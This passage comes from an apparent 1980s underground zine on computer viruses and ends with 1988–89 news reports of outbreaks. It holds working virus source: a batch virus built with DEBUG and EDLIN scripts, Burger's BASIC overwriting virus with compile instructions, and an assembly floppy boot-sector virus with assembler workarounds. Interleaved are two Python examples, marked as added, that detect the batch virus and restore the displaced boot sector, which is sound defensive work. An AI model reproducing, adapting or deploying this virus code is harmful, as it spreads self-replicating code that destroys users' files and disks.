e108 ".BAT" (Extension of file name is changed to .BAT)
m100,10b,f010 (File is saved again)
e100"DEL " (DEL command is written to address 100H)
mf000,f00b,104 (Original file is written after this command)
e10c 2e (Period is placed in front of the extension)
e110 0d,0a (Carriage return + line feed)
mf010,f020,11f ( Modified file is moved to 11FH address from buffer area)
e112 "COPY \VR.BAT" ( COPY command is now placed in front of file)
e12b od,0a (COPY command terminated with carriage return + lf)
rxc ( The CX register is ... )
2c ( set to 2CH)
nname.bat ( Name it NAME.BAT)
w ( Write )
q ( quit )
The third command file must be printed as a hex dump because it contains
two control characters (1Ah = Control-Z), which are not printable.
Hex dump of the third command file:
-----------------------------------
Name: 3
0100 31 2C 31 3F 52 20 1A 0D-6E 79 79 79 79 79 79 79
1 , 1 ? . . n y y y y y y y
0110 79 29 0D 32 2C 32 3F 52-20 1A OD 6E 6E 79 79 79
y . 2 , ? ? r . . n n y y y
0120 79 79 79 79 29 0D 45 0D-00 00 00 00 00 00 00 00
y y y y . E . . . . . . . . .
For this virus to work, VR.BAT must be in the root directory. This program
only affects .COM files.
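From the defender's side, the two files this batch virus leaves on a disk are recognisable by content: the virus body (the ctty nul / dir *.com/w>ind / debug ind<2 / edlin name.bat<3 sequence) and the generated NAME.BAT, which pairs a DEL of a .COM file with a COPY of \VR.BAT over a .BAT of the same base name. The scanner below is an added example, not part of the zine; the sample files it builds are constructed, and the function and pattern names are my own.

```python
"""Detector for the VR.BAT batch-virus artifacts described above (added example)."""
import os
import re
import tempfile
from typing import Dict, Optional

# Lines that together identify the virus body (case-insensitive, whitespace-tolerant).
BODY_SIGNATURE = (
    r"ctty\s+nul",
    r"dir\s+\*\.com\s*/w\s*>\s*ind",
    r"debug\s+ind\s*<\s*2",
    r"edlin\s+name\.bat\s*<\s*3",
)

# Generated NAME.BAT: "DEL <name>.COM" directly followed by "COPY \VR.BAT <name>.BAT".
# DIR /W pads names with spaces, so the base name may contain trailing blanks.
DEL_RE = re.compile(r"^\s*del\s+([^.]{1,8}?)\s*\.com\s*$", re.I)
COPY_RE = re.compile(r"^\s*copy\s+\\vr\.bat\s+([^.]{1,8}?)\s*\.bat\s*$", re.I)


def classify_batch(text: str) -> Optional[str]:
    """Return 'body', 'generated' or None for the given batch file contents."""
    if all(re.search(p, text, re.I) for p in BODY_SIGNATURE):
        return "body"
    lines = text.splitlines()
    for i in range(len(lines) - 1):
        m_del = DEL_RE.match(lines[i])
        m_copy = COPY_RE.match(lines[i + 1])
        if m_del and m_copy and m_del.group(1).strip().lower() == m_copy.group(1).strip().lower():
            return "generated"
    return None


def scan_directory(root: str) -> Dict[str, str]:
    """Map path -> classification for every .BAT under root that matches."""
    hits: Dict[str, str] = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(".bat"):
                continue
            path = os.path.join(dirpath, name)
            with open(path, "r", encoding="cp437", errors="replace") as fh:
                verdict = classify_batch(fh.read())
            if verdict:
                hits[path] = verdict
    return hits


def demo() -> Dict[str, str]:
    """Constructed sample directory: the virus body, a generated NAME.BAT
    and a harmless AUTOEXEC.BAT. Returns basename -> verdict."""
    root = tempfile.mkdtemp()
    samples = {
        "VR.BAT": "echo = off\r\nctty nul\r\npath c:\\msdos\r\ndir *.com/w>ind\r\n"
                  "edlin ind<1\r\ndebug ind<2\r\nedlin name.bat<3\r\nctty con\r\nname\r\n",
        "NAME.BAT": "DEL FORMAT.COM\r\nCOPY \\VR.BAT FORMAT.BAT\r\n",
        "AUTOEXEC.BAT": "@echo off\r\npath c:\\dos\r\nprompt $p$g\r\n",
    }
    for name, body in samples.items():
        with open(os.path.join(root, name), "w", encoding="cp437", newline="") as fh:
            fh.write(body)
    return {os.path.basename(p): v for p, v in scan_directory(root).items()}


if __name__ == "__main__":
    print(demo())
```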
[2.8]
Viruses in Basic
----------------
Basic is a great language, and people often think of it as a limited language
that will not be of any use in creating something like a virus. Well, you are
really wrong. Let's take a look at a Basic virus created by R. Burger in 1987.
This program is an overwriting virus and uses (Shell) MS-DOS to infect .EXE
files. To do this you must compile the source code using Microsoft
Quick-BASIC. Note the length of the compiled and linked .EXE file and edit
the source code to place the length of the object program in the LENGHTVIR
variable. BV3.EXE should be in the current directory, COMMAND.COM must be
available, the LENGHTVIR variable must be set to the length of the linked
program, and remember to use the /e parameter when compiling.
10 REM ** DEMO
20 REM ** MODIFY IT YOUR OWN WAY IF DESIRED **
30 REM ** BASIC DOESNT SUCK
40 REM ** NO KIDDING
50 ON ERROR GOTO 670
60 REM *** LENGHTVIR MUST BE SET **
70 REM *** TO THE LENGHT TO THE **
80 REM *** LINKED PROGRAM ***
90 LENGHTVIR=2641
100 VIRROOT$="BV3.EXE"
110 REM *** WRITE THE DIRECTORY IN THE FILE "INH"
130 SHELL "DIR *.EXE>INH"
140 REM ** OPEN "INH" FILE AND READ NAMES **
150 OPEN "R",1,"INH",32000
160 GET #1,1
170 LINE INPUT#1,ORIGINAL$
180 LINE INPUT#1,ORIGINAL$
190 LINE INPUT#1,ORIGINAL$
200 LINE INPUT#1,ORIGINAL$
210 ON ERROR GOT 670
220 CLOSE#2
230 F=1:LINE INPUT#1,ORIGINAL$
240 REM ** "%" IS THE MARKER OF THE BV3
250 REM ** "%" IN THE NAME MEANS
260 REM ** INFECTED COPY PRESENT
270 IF MID$(ORIGINAL$,1,1)="%" THEN GOTO 210
280 ORIGINAL$=MID$(ORIGINAL$,1,13)
290 EXTENSIONS$=MID$(ORIGINAL,9,13)
300 MID$(EXTENSIONS$,1,1)="."
310 REM *** CONCATENATE NAMES INTO FILENAMES **
320 F=F+1
330 IF MID$(ORIGINAL$,F,1)=" " OR MID$ (ORIGINAL$,F,1)="." OR F=13 THEN
GOTO 350
340 GOTO 320
350 ORIGINAL$=MID$(ORIGINAL$,1,F-1)+EXTENSION$
360 ON ERROR GOTO 210
365 TEST$=""
370 REM ++ OPEN FILE FOUND +++
380 OPEN "R",2,OROGINAL$,LENGHTVIR
390 IF LOF(2) < LENGHTVIR THEN GOTO 420
400 GET #2,2
410 LINE INPUT#1,TEST$
420 CLOSE#2
431 REM ++ CHECK IF PROGRAM IS ILL ++
440 REM ++ "%" AT THE END OF THE FILE MEANS..
450 REM ++ FILE IS ALREADY SICK ++
460 REM IF MID$(TEST,2,1)="%" THEN GOTO 210
470 CLOSE#1
480 ORIGINALS$=ORIGINAL$
490 MID$(ORIGINALS$,1,1)="%"
499 REM ++++ SANE "HEALTHY" PROGRAM ++++
510 C$="COPY "+ORIGINAL$+" "+ORIGINALS$
520 SHELL C$
530 REM *** COPY VIRUS TO HEALTHY PROGRAM ****
540 C$="COPY "+VIRROOT$+ORIGINAL$
550 SHELL C$
560 REM *** APPEND VIRUS MARKER ***
570 OPEN ORIGINAL$ FOR APPEND AS #1 LEN=13
580 WRITE#1,ORIGINALS$
590 CLOSE#1
630 REM ++ OUYPUT MESSAGE ++
640 PRINT "INFECTION IN " ;ORIGIANAL$; " !! BE WARE !!"
650 SYSTEM
660 REM ** VIRUS ERROR MESSAGE
670 PRINT "VIRUS INTERNAL ERROR GOTTCHA !!!!":SYSTEM
680 END
This Basic virus will only attack .EXE files. After execution you will
see an "INH" file, which contains the directory listing, and the file %SORT.EXE.
Programs whose names start with "%" are NOT infected; they serve as backup copies.
;[2.9]
;-----------------------------------------------------------------------;
; This virus is of the "FLOPPY ONLY" variety. ;
; It replicates to the boot sector of a floppy disk and when it gains control
; it will move itself to upper memory. It redirects the keyboard ;
; interrupt (INT 09H) to look for ALT-CTRL-DEL sequences at which time ;
; it will attempt to infect any floppy it finds in drive A:. ;
; It keeps the real boot sector at track 39, sector 8, head 0 ;
; It does not map this sector bad in the fat (unlike the Pakistani Brain)
; and should that area be used by a file, the virus ;
; will die. It also contains no anti detection mechanisms as does the ;
; BRAIN virus. It apparently uses head 0, sector 8 and not head 1 ;
; sector 9 because this is common to all floppy formats both single ;
; sided and double sided. It does not contain any malevolent TROJAN ;
; HORSE code. It does appear to contain a count of how many times it ;
; has infected other diskettes although this is harmless and the count ;
; is never accessed. ;
; ;
; Things to note about this virus: ;
; It can not only live through an ALT-CTRL-DEL reboot command, but this ;
; is its primary (only for that matter) means of reproduction to other ;
; floppy diskettes. The only way to remove it from an infected system ;
; is to turn the machine off and reboot an uninfected copy of DOS. ;
; It is even resident when no floppy is booted but BASIC is loaded ;
; instead. Then when ALT-CTRL-DEL is pressed from inside of BASIC, ;
; it activates and infectes the floppy from which the user is ;
; attempting to boot. ;
; ;
; Also note that because of the POP CS command to pass control to ;
; its self in upper memory, this virus does not to work on 80286 ;
; machines (because this is not a valid 80286 instruction). ;
; ;
; If your assembler will not allow the POP CS command to execute, replace;
; the POP CS command with an NOP and then assemble it, then debug that ;
; part of the code and place POP CS in place of NOP at that section. ;
; ;
; The Norton Utilities can be used to identify infected diskettes by ;
; looking at the boot sector and the DOS SYS utility can be used to ;
; remove it (unlike the Pakistani Brain). ;
;-----------------------------------------------------------------------;
;
ORG 7C00H ;
;
TOS LABEL WORD ;TOP OF STACK
;-----------------------------------------------------------------------;
; 1. Find top of memory and copy ourself up there. (keeping same offset);
; 2. Save a copy of the first 32 interrupt vectors to top of memory too ;
; 3. Redirect int 9 (keyboard) to ourself in top of memory ;
; 4. Jump to ourself at top of memory ;
; 5. Load and execute REAL boot sector from track 40, head 0, sector 8 ;
;-----------------------------------------------------------------------;
BEGIN: CLI ;INITIALIZE STACK
XOR AX,AX ;
MOV SS,AX ;
MOV SP,offset TOS ;
STI ;
;
MOV BX,0040H ;ES = TOP OF MEMORY - (7C00H+512)
MOV DS,BX ;
MOV AX,[0013H] ;
MUL BX ;
SUB AX,07E0H ; (7C00H+512)/16
MOV ES,AX ;
;
PUSH CS ;DS = CS
POP DS ;
;
CMP DI,3456H ;IF THE VIRUS IS REBOOTING...
JNE B_10 ;
DEC Word Ptr [COUNTER_1] ;...LOW&HI:COUNTER_1--
;
B_10: MOV SI,SP ;SP=7C00 ;COPY SELF TO TOP OF MEMORY
MOV DI,SI ;
MOV CX,512 ;
CLD ;
REP MOVSB ;
;
MOV SI,CX ;CX=0 ;SAVE FIRST 32 INT VETOR ADDRESSES TO
MOV DI,offset BEGIN - 128 ; 128 BYTES BELOW OUR HI CODE
MOV CX,128 ;
REP MOVSB ;
;
CALL PUT_NEW_09 ;SAVE/REDIRECT INT 9 (KEYBOARD)
;
PUSH ES ;ES=HI ; JUMP TO OUR HI CODE WITH
POP CS
;
PUSH DS ;DS=0 ; ES = DS
POP ES ;
;
MOV BX,SP ; SP=7C00 ;LOAD REAL BOOT SECTOR TO 0000:7C00
MOV DX,CX ;CX=0 ;DRIVE A: HEAD 0
MOV CX,2708H ; TRACK 40, SECTOR 8
MOV AX,0201H ; READ SECTOR
INT 13H ; (common to 8/9 sect. 1/2 sided!)
JB $ ; HANG IF ERROR
;
JMP JMP_BOOT ;JMP 0000:7C00
;
;-----------------------------------------------------------------------;
; SAVE THEN REDIRECT INT 9 VECTOR ;
; ;
; ON ENTRY: DS = 0 ;
; ES = WHERE TO SAVE OLD_09 & (HI) ;
; WHERE NEW_09 IS (HI) ;
;-----------------------------------------------------------------------;
PUT_NEW_09: ;
DEC Word Ptr [0413H] ;TOP OF MEMORY (0040:0013) -= 1024
;
MOV SI,9*4 ;COPY INT 9 VECTOR TO
MOV DI,offset OLD_09 ; OLD_09 (IN OUR HI CODE!)
MOV CX,0004 ;
;
CLI ;
REP MOVSB ;
MOV Word Ptr [9*4],offset NEW_09
MOV [(9*4)+2],ES ;
STI ;
;
RET ;
;
;-----------------------------------------------------------------------;
; RESET KEYBOARD, TO ACKNOWLEDGE LAST CHAR ;
;-----------------------------------------------------------------------;
ACK_KEYBD: ;
IN AL,61H ;RESET KEYBOARD THEN CONTINUE
MOV AH,AL ;
OR AL,80H ;
OUT 61H,AL ;
XCHG AL,AH ;
OUT 61H,AL ;
JMP RBOOT ;
;
;-----------------------------------------------------------------------;
; DATA AREA WHICH IS NOT USED IN THIS VERSION ;
; REASON UNKNOWN ;
;-----------------------------------------------------------------------;
TABLE DB 27H,0,1,2 ;FORMAT INFORMATION FOR TRACK 39
DB 27H,0,2,2 ; (CURRENTLY NOT USED)
DB 27H,0,3,2 ;
DB 27H,0,4,2 ;
DB 27H,0,5,2 ;
DB 27H,0,6,2 ;
DB 27H,0,7,2 ;
DB 27H,0,8,2 ;
;
;A7C9A LABEL BYTE ;
DW 00024H ;NOT USED
DB 0ADH ;
DB 07CH ;
DB 0A3H ;
DW 00026H ;
;
;L7CA1: ;
POP CX ;NOT USED
POP DI ;
POP SI ;
POP ES ;
POP DS ;
POP AX ;
POPF ;
JMP 1111:1111 ;
;
;-----------------------------------------------------------------------;
; IF ALT & CTRL & DEL THEN ... ;
; IF ALT & CTRL & ? THEN ... ;
;-----------------------------------------------------------------------;
NEW_09: PUSHF ;
STI ;
;
PUSH AX ;
PUSH BX ;
PUSH DS ;
;
PUSH CS ;DS=CS
POP DS ;
;
MOV BX,[ALT_CTRL W] ;BX=SCAN CODE LAST TIME
IN AL,60H ;GET SCAN CODE
MOV AH,AL ;SAVE IN AH
AND AX,887FH ;STRIP 8th BIT IN AL, KEEP 8th BIT AH
;
CMP AL,1DH ;IS IT A [CTRL]...
JNE N09_10 ;...JUMP IF NO
MOV BL,AH ;(BL=08 ON KEY DOWN, BL=88 ON KEY UP)
JMP N09_30 ;
;
N09_10: CMP AL,38H ;IS IT AN [ALT]...
JNE N09_20 ;...JUMP IF NO
MOV BH,AH ;(BH=08 ON KEY DOWN, BH=88 ON KEY UP)
JMP N09_30 ;
;
N09_20: CMP BX,0808H ;IF (CTRL DOWN & ALT DOWN)...
JNE N09_30 ;...JUMP IF NO
;
CMP AL,17H ;IF [I]...
JE N09_X0 ;...JUMP IF YES
CMP AL,53H ;IF [DEL]...
JE ACK_KEYBD ;...JUMP IF YES
;
N09_30: MOV [ALT_CTRL],BX ;SAVE SCAN CODE FOR NEXT TIME
;
N09_90: POP DS ;
POP BX ;
POP AX ;
POPF ;
;
DB 0EAH ;JMP F000:E987
OLD_09 DW ? ;
DW 0F000H ;
;
N09_X0: JMP N09_X1 ;
;
;-----------------------------------------------------------------------;
; ;
;-----------------------------------------------------------------------;
RBOOT: MOV DX,03D8H ;DISABLE COLOR VIDEO !?!?
MOV AX,0800H ;AL=0, AH=DELAY ARG
OUT DX,AL ;
CALL DELAY ;
MOV [ALT_CTRL],AX ;AX=0 ;
;
MOV AL,3 ;AH=0 ;SELECT 80x25 COLOR
INT 10H ;
MOV AH,2 ;SET CURSOR POS 0,0
XOR DX,DX ;
MOV BH,DH ; PAGE 0
INT 10H ;
;
MOV AH,1 ;SET CURSOR TYPE
MOV CX,0607H ;
INT 10H ;
;
MOV AX,0420H ;DELAY (AL=20H FOR EOI BELOW)
CALL DELAY ;
;
CLI ;
OUT 20H,AL ;SEND EOI TO INT CONTROLLER
;
MOV ES,CX ;CX=0 (DELAY) ;RESTORE FIRST 32 INT VECTORS
MOV DI,CX ; (REMOVING OUR INT 09 HANDLER!)
MOV SI,offset BEGIN - 128 ;
MOV CX,128 ;
CLD ;
REP MOVSB ;
;
MOV DS,CX ;CX=0 ;DS=0
;
MOV Word Ptr [19H*4],offset NEW_19 ;SET INT 19 VECTOR
MOV [(19H*4)+2],CS ;
;
MOV AX,0040H ;DS = ROM DATA AREA
MOV DS,AX ;
;
MOV [0017H],AH ;AH=0 ;KBFLAG (SHIFT STATES) = 0
INC Word Ptr [0013H] ;MEMORY SIZE += 1024 (WERE NOT ACTIVE)
;
PUSH DS ;IF BIOS F000:E502 == 21E4...
MOV AX,0F000H ;
MOV DS,AX ;
CMP Word Ptr [0E502H],21E4H ;
POP DS ;
JE R_90 ;
INT 19H ; IF NOT...REBOOT
;
R_90: JMP 0F000:0E502H ;...DO IT ?!?!?!
;
;-----------------------------------------------------------------------;
; REBOOT INT VECTOR ;
;-----------------------------------------------------------------------;
NEW_19: XOR AX,AX ;
;
MOV DS,AX ;DS=0
MOV AX,[0410] ;AX=EQUIP FLAG
TEST AL,1 ;IF FLOPPY DRIVES ...
JNZ N19_20 ;...JUMP
N19_10: PUSH CS ;ELSE ES=CS
POP ES ;
CALL PUT_NEW_09 ;SAVE/REDIRECT INT 9 (KEYBOARD)
INT 18H ;LOAD BASIC
;
N19_20: MOV CX,0004 ;RETRY COUNT = 4
;
N19_22: PUSH CX ;
MOV AH,00 ;RESET DISK
INT 13 ;
JB N19_81 ;
MOV AX,0201 ;READ BOOT SECTOR
PUSH DS ;
POP ES ;
MOV BX,offset BEGIN ;
MOV CX,1 ;TRACK 0, SECTOR 1
INT 13H ;
N19_81: POP CX ;
JNB N19_90 ;
LOOP N19_22 ;
JMP N19_10 ;IF RETRY EXPIRED...LOAD BASIC
;
;-----------------------------------------------------------------------;
; Reinfection segment. ;
;-----------------------------------------------------------------------;
N19_90: CMP DI,3456 ;IF NOT FLAG SET...
JNZ RE_INFECT ;...RE INFECT
;
JMP_BOOT: ;PASS CONTROL TO BOOT SECTOR
JMP 0000:7C00H ;
;
;-----------------------------------------------------------------------;
; Reinfection Segment. ;
;-----------------------------------------------------------------------;
RE_INFECT: ;
MOV SI,offset BEGIN ;COMPARE BOOT SECTOR JUST LOADED WITH
MOV CX,00E6H ; OURSELF
MOV DI,SI ;
PUSH CS ;
POP ES ;
CLD ;
REPE CMPSB ;
JE RI_12 ;IF NOT EQUAL...
;
INC Word Ptr ES:[COUNTER_1] ;INC. COUNTER IN OUR CODE (NOT DS!)
;
;MAKE SURE TRACK 39, HEAD 0 FORMATTED ;
MOV BX,offset TABLE ;FORMAT INFO
MOV DX,0000 ;DRIVE A: HEAD 0
MOV CH,40-1 ;TRACK 39
MOV AH,5 ;FORMAT
JMP RI_10 ;REMOVE THE FORMAT OPTION FOR NOW !
;
; <<< NO EXECUTION PATH TO HERE >>> ;
JB RI_80 ;
;
;WRITE REAL BOOT SECTOR AT TRACK 39, SECTOR 8, HEAD 0
RI_10: MOV ES,DX ;ES:BX = 0000:7C00, HEAD=0
MOV BX,offset BEGIN ;TRACK 40H
MOV CL,8 ;SECTOR 8
MOV AX,0301H ;WRITE 1 SECTOR
INT 13H ;
;
PUSH CS ; (ES=CS FOR PUT_NEW_09 BELOW)
POP ES ;
JB RI_80 ;IF WRITE ERROR...JUMP TO BOOT CODE
;
MOV CX,0001 ;WRITE INFECTED BOOT SECTOR !
MOV AX,0301 ;
INT 13H ;
JB RI_80 ; IF ERROR...JUMP TO BOOT CODE
;
RI_12: MOV DI,3456H ;SET "JUST INFECTED ANOTHER ONE"...
INT 19H ;...FLAG AND REBOOT
;
RI_80: CALL PUT_NEW_09 ;SAVE/REDIRECT INT 9 (KEYBOARD)
DEC Word Ptr ES:[COUNTER_1] ; (DEC. CAUSE DIDNT INFECT)
JMP JMP_BOOT ;
;
;-----------------------------------------------------------------------;
; ;
;-----------------------------------------------------------------------;
N09_X1: MOV [ALT_CTRL],BX ;SAVE ALT & CTRL STATUS
;
MOV AX,[COUNTER_1] ;PUT COUNTER_1 INTO RESET FLAG
MOV BX,0040H ;
MOV DS,BX ;
MOV [0072H],AX ; 0040:0072 = RESET FLAG
JMP N09_90 ;
;
;-----------------------------------------------------------------------;
; DELAY ;
; ;
; ON ENTRY AH:CX = LOOP COUNT ;
;-----------------------------------------------------------------------;
DELAY: SUB CX,CX ;
D_01: LOOP $ ;
SUB AH,1 ;
JNZ D_01 ;
RET ;
;
;-----------------------------------------------------------------------;
; ;
;-----------------------------------------------------------------------;
A7DF4 DB 27H,00H,8,2
COUNTER_1 DW 001CH
ALT_CTRL DW 0
A7DFC DB 27H,0,8,2
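The header says the cure is to put the real boot sector back, and the code shows where it is parked: track 39, head 0, sector 8 (CH=27H, DH=0, CL=8 in the INT 13H calls), chosen because that sector exists on every floppy format. The following is an added example, not part of the listing above: it locates that slot in a raw CHS-ordered floppy image, checks that it holds something boot-sector-shaped, and copies it back over sector 0. It assumes 512-byte sectors, that the caller supplies the geometry, and that a genuine DOS boot sector begins with a jump and ends with the 55AA signature; the image it builds is constructed.

```python
"""Recover the boot sector this floppy virus relocates (added example)."""
from typing import Optional

SECTOR = 512
HIDDEN_CYL, HIDDEN_HEAD, HIDDEN_SECT = 39, 0, 8  # where the virus parks the original


def lba(cyl: int, head: int, sect: int, heads: int, spt: int) -> int:
    """CHS -> zero-based logical sector (CHS sector numbers start at 1)."""
    return (cyl * heads + head) * spt + (sect - 1)


def hidden_offset(heads: int, spt: int) -> int:
    """Byte offset of the parked boot sector for the given floppy geometry."""
    return lba(HIDDEN_CYL, HIDDEN_HEAD, HIDDEN_SECT, heads, spt) * SECTOR


def looks_like_boot_sector(sector: bytes) -> bool:
    """Plausibility check: x86 jump opcode first, 55AA signature last.
    The virus above starts with CLI (0FAH), so its sector fails this test."""
    return (len(sector) == SECTOR
            and sector[0] in (0xEB, 0xE9)
            and sector[-2:] == b"\x55\xAA")


def recover_original(image: bytes, heads: int, spt: int) -> Optional[bytes]:
    """Return the parked original boot sector if the hidden slot holds one."""
    off = hidden_offset(heads, spt)
    if off + SECTOR > len(image):
        return None
    cand = image[off:off + SECTOR]
    return cand if looks_like_boot_sector(cand) else None


def disinfect(image: bytes, heads: int, spt: int) -> Optional[bytes]:
    """Write the parked sector back over sector 0. This only undoes the
    relocation; confirm sector 0 really is the virus (e.g. against a known
    copy) before trusting the result, since the slot can also hold file data."""
    orig = recover_original(image, heads, spt)
    if orig is None:
        return None
    return orig + image[SECTOR:]


def demo() -> dict:
    """Constructed 360K image (40 cyl, 2 heads, 9 spt): virus-like sector 0,
    original boot sector parked at track 39 / head 0 / sector 8."""
    heads, spt = 2, 9
    original = b"\xEB\x3C\x90IBM  3.3" + b"\x00" * (SECTOR - 11 - 2) + b"\x55\xAA"
    virus_sector = b"\xFA\x31\xC0" + b"\x00" * (SECTOR - 3)  # CLI; XOR AX,AX; ...
    image = bytearray(40 * heads * spt * SECTOR)
    image[0:SECTOR] = virus_sector
    off = hidden_offset(heads, spt)
    image[off:off + SECTOR] = original
    cleaned = disinfect(bytes(image), heads, spt)
    return {
        "sector0_suspicious": not looks_like_boot_sector(bytes(image[:SECTOR])),
        "recovered": recover_original(bytes(image), heads, spt) == original,
        "cleaned_ok": cleaned is not None and cleaned[:SECTOR] == original
                      and len(cleaned) == len(image),
    }


if __name__ == "__main__":
    print(demo())
```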
[2.10]
Virili In The News
------------------
This section deals with a large amount of stuff, basically a bunch of
viruses and other things that have been in the newspapers and magazines because
of all the damage they have done. Enjoy....
There's A Virus In My Software
Mischief-makers at the computer
are deliberately endangering data
By Philip J. Hilts
Washington Post Staff Writer
The Washington Post Weekly Edition, Page #38. May 23-29, 1988.
Tiny programs that deliberately cause mischief are epidemic among
computers and causing nervousness among those who monitor them. Since the
first tests of the notion in 1983 that machines can catch and spread
"information diseases," the computer world has reached the point at which as
many as thirty instances of "computer virus" have been reported in the past
year, affecting tens of thousands of U.S. computers alone.
Such viruses have been found at the National Aeronautics and Space
Administration, International Business Machines Corporation, the House of
Representatives, at least six universities, several major computer networks
such as Comp-u-serve and several businesses, including the world's largest
computer-service company, the $4.4 billion Electronic Data Systems
Corporation of Dallas, Texas.
Written by malicious programmers, the viruses are sneaked into computer
systems by piggybacking them on legitimate programs and messages. There,
they may be passed along or instructed to wait until a prearranged moment to
burst forth and destroy data.
Hundreds of computers at the Hebrew University of Jerusalem and other
places in Israel were hit last fall by a virus designed to spread and then,
in one swipe on a Friday the thirteenth, destroy all data in any computer it
could reach.
If not for an error by its author, who has not been caught, the virus
could have caused devastation among micro-computers in Israel and other
nations. The virus did not check to see whether it already had infected a
program and so infected some computers hundreds of times, crowding their
memories enough to call attention to itself.
In a seven-month campaign, programmers in Israel hastened to find
infected machines and ensure that the smallest number would be affected
before Friday, May 13th. Officials say they initially thought that the
infection was connected with the anniversary of the last day that Palestine
existed as a political entity but subsequently decided that it most likely
involved just Friday the thirteenth.
Apparently, the campaign was successful; there has been no word of
substantial damage. This past Friday the thirteenth is this year's only such
day.
At the Aldus Corporation of Seattle, Washington, a major software maker,
executives are huddling with lawyers to try to determine whether
international spread of such diseases is illegal. No virus cases have been
taken to court.
At N.A.S.A. headquarters in Washington, several hundred computers had to
be resuscitated after being infected. N.A.S.A. officials have taken
precautions and reminded their machines' users to follow routine computer
hygiene: Don't trust foreign data or strange machines.
Viruses have the eerie ability to perch disguised among legitimate data
just as biological viruses hide among genes in human cells, then spring out
unexpectedly, multiplying and causing damage. Experts say that even when
they try to study viruses in controlled conditions, the programs can get out
of control and erase everything in a computer. The viruses can be virtually
impossible to stop if their creators are determined enough.
"The only way to protect every-body from them is to do something much
worse than the viruses: Stop talking to one another with computers," says
William H. Murray, an information-security specialist at Ernst and Whinney
financial consultants in Hartford, Connecticut.
Hundreds of programs and files have been destroyed by viruses, and
thousands of hours of repair or prevention time have been logged.
Programmers have quickly produced antidote programs with such titles as
"Vaccine," "Flu Shot," "Data Physician," "Syringe."
Experts say known damage is minimal compared with the huge, destructive
potential. They express the hope that the attacks will persuade computer
users to minimize access to programming and data.
"What we are dealing with here is the fabric of trust in society," says
Murray. "With computer viruses, we have a big vulnerability."
Early this year, Aldus Corporation discovered that a virus had been
introduced that infected at least five-thousand copies of a new drawing
program called Freehand for the Macintosh computer. The infected copies were
packaged, sent to stores and sold. On March 2, the virus interrupted users
by flashing this message on their screens:
"Richard Brandow, publisher of MacMag, and its entire staff would like
to take this opportunity to convey their universal message of peace to all
Macintosh users around the world."
Viruses are the newest of evolving methods of computer mayhem, says
Donn B. Parker, a consultant at SRI International, a computer research firm
in Menlo Park, California. One is the "Trojan horse," a program that looks
and acts like a normal program but contains hidden commands that eventually
take effect, ordering mischief. Others include the "time bomb," which
explodes at a set time, and the "logic bomb," which goes off when the
computer arrives at a certain result during normal computation. The "salami
attack" executes barely noticeable small acts, such as shaving a
penny from thousands of accounts.
The computer virus has the capability to command the computer to make
copies of the virus and spread them. A virus typically is written only as a
few hundred characters in a program containing tens of thousands of
characters. When the computer reads legitimate instructions, it encounters
the virus, which instructs the computer to suspend normal operations for a
fraction of a second.
During that time, the virus instructs the computer to check for other
copies of itself and, if none is found, to make and hide copies. Instruction
to commit damage may be included. A few infamous viruses found in the past
year include:
[] The "scores" virus. Named after a file it spawns, it recently entered
several hundred Macintosh computers at N.A.S.A. headquarters. "It looks
as if it is searching for a particular Macintosh program with a name that
no one recognizes," spokesman Charles Redmond says.
This virus, still spreading, has reached computers in Congress'
information system at the National Oceanic and Atmospheric
Administration and at Apple Computer Incorporated's government-systems
office in Reston, Virginia. It has hit individuals, businesses and
computer "bulletin boards" where computer hobbyists share information.
It apparently originated in Dallas, Texas and has caused damage, but
seemingly only because of its clumsiness, not an instruction to do
damage.
[] The "brain" virus. Named by its authors, it was written by two brothers
in a computer store in Lahore, Pakistan, who put their names, addresses
and phone number in the virus. Like "scores," it has caused damage
inadvertently, ordering the computer to copy itself into space that
already contains information.
[] The "Christmas" virus. It struck last December after a West German
student sent friends a Christmas message through a local computer
network. The virus told the receiver's computer to display the
greeting, then secretly send the virus and message to everyone on the
recipient's regular electronic mailing list.
The student apparently had no idea that someone on the list had
special, restricted access to a major world-wide network of several
thousand computers run by I.B.M. The network broke down within hours
when the message began multiplying, stuffing the computers' memories.
No permanent damage was done, and I.B.M. says it has made repetition
impossible.
Demonstrations have shown that viruses can invade the screens of users
with the highest security classification, according to Fred Cohen of
Cincinnati, a researcher who coined the term "computer Viruses." A standard
computer-protection device at intelligence agencies, he says, denies giving
access by a person at one security level to files of anyone else at a higher
level and allows reading but denies writing of files of anyone lower.
This, however, "allows the least trusted user to write a program that
can be used by everyone" and is "very dangerous," he says.
Computers "are all at risk," says Cohen, "and will continue to be... not
just from computer viruses. But the viruses represent a new level of threat
because of their subtleness and persistence."
1.) Computer "viruses" are actually immature computer programs. Most are
written by malicious programmers intent on destroying information in
computers for fun.
2.) Those who write virus programs often conceal them on floppy disks that
are inserted in the computer. The disks contain all programs needed to
run the machine, such as word processing programs, drawing programs or
spread sheet programs.
3.) A malicious programmer makes the disk available to others, saying it
contains a useful program or game. These programs can be lent to others
or put onto computerized "bulletin boards" where anyone can copy them
for personal use.
4.) A computer receiving the programs will "read" the disk and the tiny virus
program at the same time. The virus may then order the computer to do a
number of things:
A.) Tell it to read the virus and follow instructions.
B.) Tell it to make a copy of the virus and place it on any disk inserted
in the machine today.
C.) Tell it to check the computer's clock, and on a certain date destroy
information that tells it where data is stored on any disk: if an
operator has no way of retrieving information, it is destroyed.
D.) Tell it not to list the virus programs when the computer is asked for
an index of programs.
5.) In this way, the computer will copy the virus onto many disks--perhaps
all or nearly all the disks used in the infected machine. The virus may
also be passed over the telephone, when one computer sends or receives
data from another.
6.) Ultimately hundreds or thousands of people may have infected disks and
potential time bombs in their systems.
-----------------------------------------------
'Virus' infected hospital computers,
led to epidemic of software mix-ups
-----------------------------------------------
From the San Diego Tribune
March 23, 1989
BOSTON (UPI) -- A "virus" infected computers at three Michigan hospitals
last fall and disrupted patient diagnoses at two of the centers in what appears
to be the first such invasion of a medical computer, it was reported yesterday.
The infiltration did not harm any patients but delayed diagnoses by
shutting down computers, creating files of non-existent patients and garbling
names on patient records, which could have caused more serious problems, a
doctor said.
"It definitely did affect care in delaying things and it could have
affected care in terms of losing this information completely," said Dr. Jack
Juni, a staff physician at the William Beaumont Hospitals in Troy and Royal Oak,
Mich., two of the hospitals involved.
If patient information had been lost, the virus could have forced doctors
to repeat tests that involve exposing patients to radiation, Juni said
yesterday. The phony and garbled files could have caused a mix-up in patient
diagnosis, he said.
"This was information we were using to base diagnoses on," said Juni, who
reported the case in a letter in The New England Journal of Medicine. "We were
lucky and caught it in time."
A computer virus is a set of instructions designed to reproduce and spread
